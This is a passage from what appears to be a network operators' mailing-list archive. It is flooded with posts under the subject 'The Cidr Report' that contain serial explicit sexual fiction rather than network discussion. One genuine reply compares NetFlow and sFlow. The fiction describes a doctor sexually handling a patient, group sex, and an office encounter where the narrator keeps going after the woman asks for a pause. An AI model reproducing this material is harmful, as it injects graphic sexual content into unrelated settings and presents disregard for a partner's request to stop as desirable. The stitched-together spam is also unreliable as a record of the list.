human testicles were able to get this large." She explained, each the size of a jumbo egg. "Yeah, they were never this big, they just keep growing." I said. "And look how big my penis is." I said. "This size is normal." She said. "No, because it gets much bigger when it's...uh...erect." I said. "If you don't mind, could you get erect for me?" She said, again, coldly. She whipped off her glove to write something down, and put on a new one. "I...think that might be kinda hard for me to do." I said. "I'm kinda nervous at the moment." "This would help." In her cold way, my doctor quickly got down on her knees, and began tugging at my penis. "Ah...whoa, what are you doing." I said. "I know this seems awkward...but I really...must examine you erect." She said. I was confused, as her cold demeanor slowly left her voice. Little by little, she tugged and stimulated with her gloves hands. Even though her shirt was conservative, her breasts were so large, it was hard to hide the cleavage. I quickly grew erect. Inch by inch, it kept swelling. "Oh my..." She said, watching it grow toward her face. Confused, she backed away, but it kept growing toward her. "This is...how big was it before your growth spurt?" "I'm not sure...I think around 6 inches." I said, as it reached it's full, 11 by 7 erect status. She bites her lower lip, catches herself doing so, and quickly stops. Slowly, she moves her hands up and down my shaft, examining it. "Uh...Doctor?" She ignored me, almost hypnotized by my massive member. It started as her squeezing random parts, looking for something irregular, but over time, she began to simply stimulate me. "Doctor?" I said. She still didn't respond. It took all the will power in my being to turn away from her. "Doctor!" I said, louder. She snapped out of it, and looked up at me. "Oh my God..." She said, and stood up, and faced away from me. "Oh my God I'm so sorry I've never acted like this before." "It's alright." I said, in a low volume, but annoyed voice. I would give anything to tear this women apart, but I just kept Amanda's face in my mind. I struggled to put on my clothes with my giant erection still up. I managed to force my erection to the side, almost wrapping around to the side of my hip. "I am so sorry sir, I apologize. Oh God I can't believe this." She said. "I understand if you want to switch services. I'm so sorry." "Look, is everything okay?" I asked. "Huh? Oh yes, I have found nothing cancerous. I will transfer these records to another doctor if you want to go with someone else. Just get a checkup again in a few weeks, and we will compare the results. Some tests will get taken. Again, I am so sorry, I am usually very professional." She said, really quickly. My erection still at full force, I said goodbye to the doctor, and left the office. On my way out, it was like slow motion, everyone was staring in awe at my giant penis, stretching my pants. I quickly walked to my car, and sat in. My erection was painful, restricted by my jeans, which were small as my lower body added muscle and mass over the weeks. As I drove, the pain kept building. I undid my pants, and my erection sprang upward, still full and strong. "Dammit." I said, frustrated. This was the first time in my life I wished I had a bigger car, instead of my small efficient one. I just made to make sure I kept moving, any car next to me would easily see my giant erection. I managed to make it to the stoplight right before my home without an incident. I did my best to hide my erection, when a truck pulled up next to me. I was busy trying to hide it to notice, but when I finally looked over, I saw a car full of beautiful sorority girls, at least 3 of them looking, with the driver attempting to look. "Holy shit that is huge!" The girl in the passenger seat said. "Hey there!" The one in the backseat said. "Let me see, how big is it?" One shouted from the backseat. "Seriously, this guy is bigger than Brad!" The one in the front said. "I wanna see! Is he cute! Invite him over!" Oh God, I had to get out of here. "Hey, you should come to our sorority house. We'll give that giant thing the night it deserves!" "Uh...sorry, I'm married." I said, trying to tuck my penis in my shirt, angry that I didn't think of that before. "Oh...he's really buff too." "He's married though." At the same time, all the girls said "Aww..." A piece of paper landed on my lap. "If you ever leave your wife, call me!" She said. "Or if not...whatever!" The light turned green, and I quickly sped off. I finally made it home, and sat on my bed, masturbating furiously. I was going at it for a good hour, having orgasm after orgasm, and my erection wouldn't subside. Having so many beautiful girls hit on me was too much.? When Amanda finally got home 4 hours later, I beat the record, giving her 8 orgasms during the span of that day. From hugenog at rocketmail.com Fri Jul 13 12:43:27 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:43:27 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> A week later, I kept watching my body, examining every detail. I was annoyed that my doctor came onto me, but she was the only one I could use to reference my body size, and I wanted this to stop as soon as possible. Amanda, though, seemed unphased when I told her the story of what happened. She said she couldn't blame the doctor, because I am the hottest man alive. I was slightly annoyed by this. I wanted to be devoted to my wife, the love of my life, and she didn't even care. This was different. I remember when she told me she would "...rip your balls off and stick them so far up your ass that they would come out of yours eyes." if she ever caught me cheating. She was joking...but I could tell that she was deadly serious about cheating. Now, she is...almost encouraging me to cheat. I was more surprised, when after 5 hours of sex that night, she made an odd suggestion. "So...remember how I said Rachel and Hannah couldn't stop talking about you?" Amanda asked me. "What? I thought you said they only said I was hot or whatever." "Yeah, but they always say it." She said, giving me a peck on the nose. "They...they kinda beg me to let them have some of you." She said. "What?" I was a bit confused. Rachel and Hannah were very attractive girls. They were high school friends with Amanda, and were just as fit as her. Rachel was tall, 6'1". She was small chested, but built like a fitness super model. She had thick, muscular legs, and the best ass I've ever seen. Her stomach had a significant outline of abs, and her shoulders were broad. her arms were defined, as she did weight lift often. She wasn't bulky or manly, but very fit. She was blonde, with green eyes.? Hannah, on the other hand, was exotic looking. She was 5'5", and just as fit as Rachel and Amanda, except more built. She was half Arabic, and had dark skin, hair, and eyes. She was a C cup, with an amazing ass, and very wide hips. This looked amazing on her very small waist. "I really want them here, with us." Amanda said, completely sincere. "I was kinda scared of your reaction..." "Wait, you want me to have sex with them?" I asked, confused. "Well, I want all 3 of us with you, here. In our bed." She said. I shook my head. "Our bed!?" I felt like something sacred was being defiled. Am I the only guy...no, only person, who felt that sex had any special connection to it? "Sex isn't something that should just be thrown around to anyone, Amanda! I Love YOU. Not Rachel, not Hannah, not that fucking doctor. You!" "I know that!" She said, annoyed that it seemed like I was accusing her of not loving me. "But this isn't something that is permanent. We're young! We should have a bit of fun for a while, you know? Maybe play around now, and then you can devote yourself to me." She suggested. "I..." I took a deep breath. This was making me incredibly sad. "You told me yourself, You've only been with 1 girl before me, right?" "Ya..." I said. "So you are gonna go your whole life, with only 2 women, and think that will be enough for you?" "Are you cheating on me?" I asked. "What?!" "Why else would you be trying to get me to be with other women? You are trying to soften the blow!?" I said. "Ew! I would never cheat on you, you asshole!" She shouted, and got out of bed. "I'm giving you an offer. If I wanted to have sex with another guy, I would fucking ask." She said, angry, as she began to put on her clothes. "This doesn't make sense, Amanda. you've never acted like this. Now that I'm huge, you want to share me?" I said. "My body has changed the way you look at me." "No you idiot. I changed. I'm different. Everyone changes Tim. I'm willing to keep things the way they are. But I'm more open about changing them. The only thing that changed is that I want to try new things. That's it." She explained. "Stop assuming things. I just want to have fun. If you don't wanna, that's fine. And I'm asking you now, do you want to do this?" She said. I paused. 3 incredibly sexy women, all focused on me? Amanda really wanted to do this. This should be a dream come true. I think because this is all based in my growth, I'm scared of it. I hate even the good things coming from this growth, but I shouldn't put that onto Amanda. If it will make her happy...it's my obligation to do so. "Fine." I said. She jumped up with joy, like a little kid allowed to do something after begging her parents. "I'll call them right now!" She said. On her phone, she talked fast, explaining the situation. She planned to have the event the next week. As the day approached, I got really sick. I'm not sure exactly what happened, but I could barely move. I laid in my bed for 3 days. The sex party was delayed until the next week. The day finally arrived. Amanda had been preparing everything. Candles, lube, sexy lingerie. She had Hannah and Rachel tested for any STD's, and made sure they were on birth control. She wanted this to be perfect. It was 3 weeks since I was last at my doctor, getting measured. Amanda wanted to measure me today though. She started with height. Standing on the bed, she marked my height on the wall, and then measured with a tape measure. "Haha! That's amazing, you are 6 feet, 8 and a half inches tall!" She said. I cringed. I hated these numbers. Amanda loved them. "Come on, get on the scale. Look how big your arms are getting." She said, almost hypnotized by my large biceps. I stepped on the scale. It spun all the way around, past the 0 once, and back to 15 lbs. "This is a maximum of 300, right?" I asked. "Yeah." Amanda said. "I'm 315 lbs." I said, frustrated. "My big man!" She said, hugging me around my stomach. She took a deep breath, absorbing my scent that she loved. "Next!" She quickly pulled down my boxers, and tugged on my penis. "Hold on, if it gets hard, I'm gonna have to have sex with you to make it go flaccid again." I said. "That's fine. It's not like either of us will have problems getting hot tonight." She said, with a smile. "Close your eyes!" She said. "I want it to be a surprise to you." I listened, and she measured my length, and girth. "My God..." She said, and quickly ran and got her phone. "What? How big am I?" I asked, confused. She put up her finger, now on the phone. "Rachel! Guess what! Tonight, we have a foot long penis to play with! Yeah! He got even bigger! It's 7.4 around too. I don't know, a soda can is like...8 inches around. Yeah, everything on him just keeps getting bigger. Of course you can. The bigger he gets, the more help I'm gonna need to get him off. Haha! Oh yeah, of course! He looks like a body builder right now. Except probably bigger. And less shiny. He put on like...50 lbs in 3 weeks. He's huge!" This whole phone conversation, all I was doing, was staring at my giant penis, looking at it like a curse. An ever growing, swelling, thickening curse. I was turning less and less into a person, but more and more into a being made just for sex. They both finally came. I was sitting on the edge of my bed, having a conflict of interest. I kept telling myself this was for Amanda. I kept telling myself I wasn't doing this for myself. But once all 3 girls walked in, each in only their bra and panties, I couldn't deny that I wanted this, just like any other guy. My libido overwhelmed any moral conflict I may have had. Amanda had already told me to be naked, so I sat there, with my 7 inch flaccid penis hanging down. From hugenog at rocketmail.com Fri Jul 13 12:43:59 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:43:59 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> Message-ID: <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> "I forgot how big he was..." Hannah said. "I told Rachel already, he grew even bigger." Amanda said. "Let's get started." Amanda said, and unhooked her bra, and walked toward me. She pushed herself against me, and we began kissing, my erection slowly forming up. The other 2 girls followed suite, taking off their bras. Rachel was the first to grab my penis, stroking it as he grew in her hand. "God...it keeps getting bigger." Rachel said, amazed at how big it was growing. Hannah got down on her knees, and sat between my legs as I sat on the bed. She went low, and softly began to lick my balls. Rachel, on the left side of me, softly tugged at my penis, watching as it grew and grew. I watched these two girls intently, as Amanda, on my right side, kissed my neck. Amanda glanced down, seeing my penis. "It's hard now. Lets get started. I get middle." She said. Hannah shifted over, and Rachel got into place. With Rachel on the left side, my wife in the middle, and Hannah on the right, all 3 of them began to lick up and down my giant foot long penis. I'm not sure who it was, but there was a hand cupping and playing with my balls. The girls alternated kissing each other randomly, while still licking my member. It quickly grew shinny with their saliva. "Lay back." Amanda said, as she got up. "God...it's longer than my face." Hannah said, as she put her face against my penis. Rachel put her arm up next to it, and laughed a bit. "I don't know...it's longer than my forearm, is that thing going to fit inside of me?" The look of awe never left their face this entire time. I was laid back, and Amanda came and sat on my face, facing the 2 women who kept licking and stroking my genitals. I licked and nibbled at Amanda, knowing exactly what got her going, her beautiful ass on my face. This continued for several moments, until Amanda got up. "Okay, let me take it first, and you guys get warmed up. You can't take this thing without some foreplay." Amanda said, and stood at the foot of the bed where I sat. She slowly inserted herself down onto my giant penis, moving up and down while softly rubbing her clit. I still laid back, as I suddenly see Rachel put her womanhood in my face, her butt pointed toward Amanda. I took this hint, and began eating her out. Hannah sat with her back against the headboard of our king size bed behind me. Rachel bent down as I ate her out, and began to eat out Hannah. The room was full of the 3 beautiful girls moaning and breathing heavy, as Amanda slowly took more nad more of my giant member. Amanda began moaning softly, then her moans increased in volume. This was unusual, because Amanda was usually as quiet as a mouse during sex. I couldn't see much, but I felt liquid pouring down on my waist and penis, as Amanda began moaning having an intense orgasm. I felt her shaking slightly as she got off my penis, her orgasm lasting for a good 4 minutes. "Were you having an orgasm that whole time?" Rachel asked. Amanda smiled. "Yeah..." She panted. "Try it out." "Go ahead." Hannah said. "I don't think I'm ready yet." Rachel smiled, and jumped off my face. I sat up, and she faced away from me, going reverse cowgirl. She stuck her delicious, perfect ass out slightly at me, and I grabbed and caressed it slightly, and then slowly led it onto my giant penis. She bit her lip as she slowly plunged downward. "Oh God...this is fucking huge..." She said. "God...." She said, as she slowly moved up and down. "I feel like I'm being torn in half..." Hannah sat next to me, watching intently. As Rachel slowly moved farther and farther down my penis, trying to adapt to it, Hannah was watching and smiling. I glanced over at Amanda, who was rubbing herself. She still didn't have enough. I slowly moved my hand over to Hannah, and began rubbing her vagina, and then fingering her. "Oh God your right...even his fingers are big. I keep wondering how much bigger he'll get." Hannah said. I cringed a bit. Rachel moaned softly. "I hope he keeps growing...this is amazing." I cringed more. "Oh, I feed my man. Keep him healthy. He's getting as big as possible." Amanda said, with a huge smile. I closed my eyes, and tried to ignore this conversation. "Whatever you're feeding him, keep it up!" Hannah said. "I can't stop picturing him bigger and bigger..." Amanda said. "I never thought so much man would be such a turn on." Hannah said, as I continued to finger her, and she began to pant, and move in really close to me. I hate this conversation. I don't want to grow anymore. "Oh God...oh fuck...yeah....yeah oh yeah!" Rachel started repeating these cliche sayings over and over again, as wave after wave after wave of orgasm slammed her body. Her legs gave way, and she fell forward. I quickly grabbed her around her waist, and stood up holding her. I turned her around, and she leaned over the bed, on her knees. She regained control over he extremities, as I slowly pulled out. "NO! Keep going! Fuck me!" I obliged, pushing myself into her, on my knees, as moisture poured from her nether region, and she was hit with several more orgasms. "Rachel, stop hogging!" Hannah said, jokingly. I pulled out, and Rachel moved aside. I sat on the floor, with my back against the foot of the bed. Hannah faced me, and put herself on my penis, more easily than the other girls, and began pumping away. Amanda moved in, and sat on my stomach, between me and Hannah, her breasts right in my face. I kissed and fondled them, as Hannah began kissing Amanda's neck and back. Rachel was laying on the bed behind me, her head touching my head. Amanda leaned forward and upward, kissing Rachel as she fingered herself. After Hannah had her waves of orgasms, She sat up, and sat on the bed. Amanda and Rachel followed. "Come on, Tim." Amanda said. "Let us have it." I stood up, and began stroking my giant penis after what had been a fast 4 hours of stimulation. It throbbed, blood poured into it as I grew more and more turned on to these 3 girls, waiting for my seed to unleash onto them. They huddled close,each of their hands playing with what they could in anticipating the massive amount of fluid that would soon come flowing onto them. My penis swelled even larger, as it prepared to orgasm. Almost out of nowhere, my first huge stream shot out, slamming Amanda in the face, causing her to move back slightly. The splash damage hit Rachel, who gasped. Her gasp barely even finished as my 2nd shot slammed on her neck and breasts. The 3rd one, the largest shot, hit Hannah in the mouth. She licked her lips and swallowed. The 2 new girls didn't know I would keep going, and I did. Shot after shot after shot showered onto them. "Oh my God he won't stop!" Rachel said, as more and more of my load splashed onto her. "I know, that's my man!" Amanda said, now only her hands still on my penis, encouraging blast after blast of semen to pour our, as she aimed it between her and her 2 friends. Finally, my penis started dribbling instead of launching, and the girls were soaked. They voted to shower together, and invited me in. The night continued like this. I lost count as to how many orgasms the girls had. But we went at it for 2 more hours. All 3 girls laid on my bed, knocked out. I stood over them, my erection still full, throbbing, and ready for more. I sighed, and sat down on a chair in my room. I stroked my penis, giving it what it wanted until it would go back to being flaccid. From hugenog at rocketmail.com Fri Jul 13 12:44:35 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:44:35 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <1342201475.81160.YahooMailNeo@web140805.mail.bf1.yahoo.com> "Ugh..." I mumbled, sitting at my desk, tugging at my shirt and pants which were uncomfortably tight on me. I remember buying this shirt last week, and it was already small. It bothered me that on one of the few days I actually had to be in the office, I was already bigger. It didn't help that all the women in the office were constantly flirting with me, testing my loyalties to my wife. This office had an unusually high number of female workers, especially in a field like mine, which only 15% of females actually wanted to be in. Yet, 70% of the employees were female. Young, attractive females. Young, attractive females that all wanted me. I gave as many of them the cold shoulder as I could. That was, until Linda popped her head around the corner. "Hi, Tim. haven't seen you in a while." She said. I had met Linda in college, but we stayed platonic friends. Based on our positions at work, we ended up having lots of work together. This was a bit tough, because Linda is...well...very hot. There was always random flirting, and I've gotten a few drunk phone calls of her propositioning me for sex. But my ever growing body made her more bold, and my ever growing sexual appetite wore away at my will power. "Oh, Hey Linda. What's going on."? Linda was good at keeping me at a distance though. An office fling could ruin her career if people found out about it. But today was different. I had grown significantly. She was extremely sexy, too. She had a thin and lean body. She had the body of a super model, standing at 5'11". Her breasts were big for her body, a 32C. She had long, flowing dark brown hair, that went down to her mid back. Her eyes were grey, sitting very well on her beautiful face. Linda could get whatever she wanted with her looks. She had too much integrity to use her looks to get ahead, though. She was in her position on merit alone, even though no one else believed it. "Not much. You're looking good. I see the gym has been kind to you." She said, with a smile. "Uh...Yeah." I said, not wanting to give her any wrong signs. I tried to avoid eye contact...but she is gorgeous. I would attempt to steal glances at her, and she caught me every time. "You look taller, too. Did you get taller? Aren't you too old to still be getting taller?" She asked, trying her best to get a conversation going with me. "I don't think gyms make people taller." I said. She laughed. I wasn't trying to be funny, she was flirting. "Well, I know how stressful things get around here. Everyone needs someway to blow off steam. You go to the gym, and I...well..." She fixed her posture a bit, and stuck her chest out slightly. "...have other things." She put her hand on my shoulder. I paused, and tried not to move. There is something more to this. Even being this much bigger shouldn't attract women like this...right? Her touch, even though the shirt, got my heart racing. it didn't help that my flaccid penis and testicles were so big in my tight pants, that they already showed, creating what Linda could've misinterpreted as an erection. Well...misinterpreted for now. "Uh...Linda." I said, putting up my hand with the wedding ring. "I'm married." I said. "So? That doesn't mean we can't have fun. What is this, some Muslim country." She said, and smirked. That didn't sound much like Linda. She was usually very sensitive to other cultures. Especially with the news lately, Muslim-jokes were a sensitive topic for her. "I thought you said they were only that way because of exploitation and..." "Tim, it was a joke." She said, rubbing my shoulder softly. I know I could've ended this by just removing her hand. But I didn't. She was hard to resist. In all the time I've known Amanda, I've never met a girl I ever considered more beautiful than her. I considered myself lucky that I found no girl more attractive than Amanda. Except for Linda, who had the face that only corny legends spoke of. "Linda...please..." I said, trying to keep my eyes on my computer. She was behind me, to my left, standing over me. She leaned her head forward a bit. "Tim, only one time. We've known each other for a long time. Don't you think it's unfair that we never got to have sex?" She said. She leaned forward, and a button popped off her blouse, which landed right on my keyboard. This confused me a bit, considering her blouse didn't look tight a few moments ago. I glanced back and up at her, and almost gasped at the sight. Her breasts looked massive. I closed my eyes quickly, and looked back at my computer screen. "Linda, please go." I said, feeling my pants grow tighter in my crotch, as my penis slowly began to erect. Linda smirked, and rebuttoned her shirt, with the button that was still sitting on my keyboard. I looked back up at her, and her breasts were back to normal. She slowly left my cubical, trying her best to look sexy as she did so while giving a small, sexy sigh. I looked on my desk, where I swore the button had flung to, and it wasn't there. My penis, continued it's path to erection. I quickly made my way to the bathroom, ignoring the girls who acted like they had something important to tell me. I got to the bathroom, and splashed my face with water. I quickly undid my pants, and my penis jumped out. I took a few deep breaths, and my penis stopped getting hard, but stayed in a semi-erect state. I took out my phone, and called Amanda. "Hello?" She answered. "Amanda, I gotta come home. Every girl here is trying to have sex with me, I can't handle this." I said, panicked. "Tim, calm down, it's okay." She said. Her voice soothed me a bit. "If it's really that hard to resist, just go ahead." "Go ahead? Are you telling me to have sex with these girls?" I said, annoyed. "Tim, you've become perfect. Whatever it is about you, I would be a bitch to keep to myself." She said. "Amanda, this girl is one of the most beautiful girls I've ever seen. I've resisted her our whole marriage. I can't believe you are telling me to just have sex with her. I won't." I was pissed. I needed Amanda's help to get through this, and her sudden sexual open mindedness was not something I wanted to deal with now. "Really? She's been coming onto you the whole time we've been married?" She asked. "Yes." "That's hilarious. I feel bad for her. Just have sex with her Tim. She earned it." She said. I couldn't tell if she was joking or not. "Amanda..." "Tim. I'm busy. Unless this is an actual emergency, I'm going to hang up. I have to finish this paper. If you want to have sex with her, go ahead. Honestly, I don't care. I want her to know what I get every night. So just relax, and do whatever you want. Bye." She said happily, and hung up. I was really annoyed at this point. I put my phone back in my pocket, and did my best to stuff my semi back into my pants. It wouldn't go in pointed down comfortably, and if I pointed it upward, it would just come out of my pants. I pointed it sideways, and it wrapped around my leg to the side. I stepped back and looked in the mirror. It was extremely obvious that it was my penis reaching sideways. I took a deep breath, having no other choice but to get back to work. I opened the door, and there Linda was. She looked more curvy. Her hips were widen, her breasts were larger, She was taller. Her stomach was exposed, her blouse unable to be tucked in because of her sudden burst in size. My heart was racing, as I tried to rationalize this. From jeroen at unfix.org Fri Jul 13 12:44:54 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 19:44:54 +0200 Subject: Real world sflow vs netflow? In-Reply-To: References: Message-ID: <50005E96.9010701@unfix.org> On 2012-07-13 19:30, David Hubbard wrote: [..] > We don't use it for > billing purposes, mostly for spotting malicious > remote hosts doing things like scans, spotting > traffic such as weird ports in use in either > direction that warrant further investigation, [..] The primary difference between NetFlow/IPFIX and sFlow is that NetFlow is unsampled while sFlow is sampled. As such, for these kind of cases it might be more worthy to have NetFlow than sFlow as you get all the source/dest ports. On the other hand sFlow can give you packet headers and that might be useful if you get every first say 200 bytes of every flow. Though depending on the hardware and traffic volume and traffic mix you might have to sample anyway. Oh and there is a small difference in the packet formats and the idea behind why something exists, but that won't hurt you too much. Greets, Jeroen From hugenog at rocketmail.com Fri Jul 13 12:45:11 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:45:11 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201475.81160.YahooMailNeo@web140805.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201475.81160.YahooMailNeo@web140805.mail.bf1.yahoo.com> Message-ID: <1342201511.7694.YahooMailNeo@web140806.mail.bf1.yahoo.com> "L-Linda?" I was losing it. "What...what's happening to you?" She put her hand on my chest, and pushed me back into the bathroom. She turned around, and closed the door, locking it behind her. "I'm one of the most beautiful girl's you've ever seen, eh?" She said, unbuttoning the top button of her tight blouse. This gave me a flashback of when her breasts somehow...grew? My erection restarted it's trajectory toward full erection. It thickened, causing it to look like my pants were painted over it. My penis head moved further and further right, at first moving along my thigh, but then coming off it as my penis hardened. My penis struggled to get to it's natural position. "Linda, that was a private conversation." I said. "You're right." She said. "I shouldn't have listened, but I couldn't help it. I want you so badly. And your wife doesn't mind, right?" "Linda...please." I said, my penis aching, still swelling and trapped within my too tight pants. It began to hurt. She glanced down, and gasped. There was a pause for a few moments, as it continued to enlarge. "My God...it's so big...and it's still getting bigger?" She said, and bit her lip. She grabbed her blouse, and ripped it open. Her breasts were absolutely massive, and bulged out of her bra in every direction. I gasped. "Linda!" I said, looking away, and then back quickly. I still tried to convince myself that I was trying to resist. With that, my penis had a surge, reaching it's full erect size quickly. A tearing sound began to fill the air. "What was that..." she asked. I thought it was her breasts suddenly growing again. But when I looked down, seeing my penis, pointed sideways in my pants, slowly forcing it's way forward. It was ripping out of my cheap pants (which I got because I didn't want to waste money on pants I would just outgrow again).? "Oh crap..." I whispered to myself, as my penis flung forward, ripping my pants open in front. My penis throbbed, pointing directly at her. "Oh God! That's amazing!" She said, quickly throwing her shirt off, and grabbing my penis, stroking it with vigor. "This is so fucking big! I can't believe it's so hard and big that it ripped out of your pants!" She said. "I knew you were packing, I just thought you were packing a human penis. I can't wait to have this thing in me. Give it to me you fucking jerk, hiding this from me all this time. You made me wait too long for it." She said, and begun viciously stroking and licking my giant member. "Oh God it tastes so good...it's so big...It's gotta be almost 13 inches." I was confused. I measured my penis this morning at 12.8 inches long, and 7.6 inches around. How did she know just from eye balling it? This thought was quickly replaced by the intense blow job she was giving me. I don't even know how she managed to fit my giant penis head so far down her throat. She plunged her mouth down more than half of my penis, I felt her tongue shifting around around it to the best of her ability. Her mouth looked small, but opened wide. Her thick, juicy lips wrapped around my penis, shifting and moving perfectly. She was an expert at this. "God..." I said, this felt amazing. She took her mouth off, and stroked with both hands. "This is by far the biggest dick I've ever had. I've never met a dick I couldn't swallow completely. You are a challenge Tim..." She said. and started licking, kissing, and sucking on my giant balls. "Even your balls are huge...it's like 2 eggs...no wait...these are too big to be eggs." She said, with a giggle. Her hands were grabbing whatever she could touch. She attempted to deepthroat again, her hands clawing at my thighs and lower back. She wanted more and more. I began to doubt that even I was enough for her with the way she was acting. I gave up the act of resisting. I pulled the remainders of my pants down, and kicked them away, finally happy to have my lower body freed from the tight confines of my ever shrinking clothes. Linda managed to plunge more and more of my gigantic penis down her throat. I tried to wrap my mind around how she was able to do it, but it felt too good for me to focus, or really even care. I attempted to unbutton my dress shirt after throwing off my tie, but it was hard to do while being blown. My shirt was so tight on my body, that it was hard to get the buttons off. Frustrated, I ripped it open, and let it fall behind me. Now only in my shoes, Rachel continued to work my throbbing member. Her saliva dripped down my shaft and onto the floor. She tried her best to swallow, but my penis was incredibly hard, and wouldn't curve down into her throat. "God dammit...I've never met a dick I couldn't deep throat. You're my white whale, Tim." She joked. "I guess I gotta give up for now." She said, and stood up. She turned around, and stepped over my penis, so it was between her legs, and she was facing away from me, but her body pushed up against me. I reached down between her legs, lifting her skirt up. She was commando today, just like me. I began to kiss her neck, and began to finger her. "Holy Jesus your fingers are big." She said, as she softly swayed her hips, grinding against the top of my penis. She gasped a bit. "Sorry." I said, use to being careful. "Don't fucking apologize." She said, pushing my hand further into her crotch. "I'm your fucking toy. I have no limits. Fuck me as hard as you want." She said, as she began to stroke my penis under her. "You will fuck the shit out of me, ok? I can handle anything you give me. Just fuck me until you can't fuck anymore." With my other hand, I grabbed her blouse, and ripped it off the left half of her body. Instantly, she moan and I felt a flood of juices cover my hand and splash onto my penis. I removed my right hand from her womanhood, and ripped the skirt off. Her head arched back. She loved it. She loved being treated like a sexual object. I lifted her up and put her on the ground. "On the floor." "What are you gonna do? Are you gonna fuck me?" She said, slowly moving toward the ground. "You had better fuck me as hard as you can. You're probably all show." She said, with a wicked smirk, as she laid back. I stepped over her, and smirked a bit over my massive shadow. I tried to imagine what her perspective was at this point, laying down on the floor, with a hugely built, tall, muscular man with a giant penis, looming over her, the florescent lights making it hard for her to make out minor features. I kinda ruined the moment, "Are you ready for it?" "It doesn't matter you idiot. Fuck me you stupid shit!" She said, trying to get me worked up. I got down on my knees, and began to rub the outside of her crotch with my penis head. "Come onnnn." She whined, as she began to rub her clit. "Put it in you asshole!" I put the penis head in, and she gasped. I felt another flood of juices cover my penis, and dripped onto the floor. I've never seen a girl react like this, having an orgasm just from insertion. I thought this kinda stuff only happened in shitty porn. "Come on....Please...." She begged, her body reeling. "Please..." She moaned. I pushed myself in and out of her, as fast as I could. It was like each thrust had given her an orgasm, as she began moaning loudly almost immediately. It was almost like the ocean, every few moments, she would moan louder, and a wave of liquid would flow out from her. I never knew women could get this wet. This continued for an hour, and I began to ejaculate. Partially in her, partially on her stomach and the floor. "God damn...I've never cum so much in my life..." She said, lifting her hand off the floor. "And seriously, were you ever gonna stop shooting? You covered the floor in your stuff!" She said, as I stood up, my penis still fully erect. She paused, and looked up. "You...still aren't done?" "No." I said, and reached down, and picked her up. My hands were around her waist, as I easily lifted her and put her against the wall of the bathroom stall. I wrapped my arms around her thighs, and lifted her up higher. "Oh God..." She moaned, as I slowly got my penis inside her, and then began to pump in and out faster and faster. I managed to get inside her completely, as her constant tidal flow of her own ejaculate flowed down my shaft and dripped down my legs. I was lost in lust, but I swear Linda's breasts had grown even more. I noticed a slightly alteration in her weight too, as her body grew taller in my arms. I shook my head, and continued banging the shit out of her. She had climax after climax before I had mine again. The floor under us was completely soaked. I wondered where it was all coming from, as I set her down, and let her catch her breath. She stumbled over to the sink, panting like she just sprinted a marathon. She didn't even look up. Her body was slightly bigger again. "I know you aren't done." She said. "Neither of us our leaving until both of us are done." She said, turning on the water. She splashed her face. I just watched, mesmerized by every little movement she made. Even though she was exhausted, sweaty, and stumbling around like she was drunk, I was still entranced. "Linda...what's happening to you?" I asked. "What do you mean?" She panted. "Why are you growing?" She pooled water in her hands, and brought it to her mouth, and drank. "What are you talking about?" She said. She was standing upright now. "You're..." I blinked. Her head was pushing up the ceiling tiles, which were 10 feet high. I blinked again. She was back to normal. "I..." It wasn't her. It was me. I was seeing things. "Nevermind." I waited a minute more for her to catch her breath, and then walked up behind her, and pushed her head down over the sink. I pulled her waist up a bit so I can insert my penis, doggy style. Her ass perked up. "Hold on Tim...I still need to catch my breath." I ignored her, and as I pressed myself into her, she instantly exploded in wetness again. "Just...a few...minutes..." She panted, as she didn't resist my advances at all. "Fuck!" She shouted, as her body literally quaked with another orgasm. She used her hands to prop herself up on sink. Her head and face kept randomly hitting the mirror, leaving smears and spots on it. This position lasted for hours, like our previous ones. I had fucked her harder than I fucked anyone in my whole life. She had more orgasms, and gave me more orgasms, in a shorter time span than anything me and Amanda ever got to. This was by far the best sex I had ever had. This sex was suppose to be for my wife. Not for her. She laid on the floor, her back against the wall. She was asleep. She couldn't handle anymore. I was still full erect. I examined her body, which had grown again. Her breasts were easily bigger than Amanda's now. She must've been at least 6'3" or 6'4" at this point. I began to doubt my own sanity. There had to be some connection between my growth, and Linda's. I began to wonder if this was permanent. I couldn't think. My mind was going a mile a minute, and I still wanted to fuck some more. I grabbed whatever was left and put on what I could. It was 6:00 p.m. Everyone already left the office except a few janitors. I stormed out of the office, and headed home. I can't believe I just cheated on my wife. I can't believe I spent my entire workday, in a locked bathroom, having sex. I couldn't believe what I've become. From hugenog at rocketmail.com Fri Jul 13 12:45:44 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:45:44 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: 